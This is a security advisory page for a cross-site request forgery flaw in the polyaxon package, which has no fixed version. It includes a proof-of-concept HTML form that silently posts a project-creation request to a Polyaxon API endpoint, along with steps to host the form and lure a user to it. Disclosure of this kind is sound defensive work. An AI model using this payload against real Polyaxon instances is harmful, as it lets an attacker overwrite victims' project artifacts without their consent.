Cross-site Request Forgery (CSRF) Affecting polyaxon package, versions [0,]


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.02% (3rd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Cross-site Request Forgery (CSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-POLYAXON-9584622
  • published1 Apr 2025
  • disclosed20 Mar 2025
  • creditsrivallikusumba

Introduced: 20 Mar 2025

NewCVE-2024-9365  (opens in a new tab)
CWE-352  (opens in a new tab)

How to fix?

There is no fixed version for polyaxon.

Overview

polyaxon is a Command Line Interface (CLI) and client to interact with Polyaxon API.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via the create endpoint. An attacker who can convince a user to follow a malicious link can cause the creation of a malicious project in their instance, which will overwrite the existing project artifacts even if it fails.

PoC

  1. Host a file with the following contents:
<html>
  <body>
    ### CSRF PoC: Project Creation
    <form action="http://localhost:8000/api/v1/default/projects/create" method="POST">
      <input type="hidden" name="name" value="12345">
      <input type="hidden" name="description" value="">
      <input type="hidden" name="tags" value="[]">
      <input type="hidden" name="is_public" value="false">
      <input type="hidden" name="excluded_features" value="[]">
      <input type="submit" value="Submit CSRF Request">
    </form>
  </body>
</html>
  1. Convince a user to follow a link to this file.

CVSS Base Scores

version 4.0
version 3.1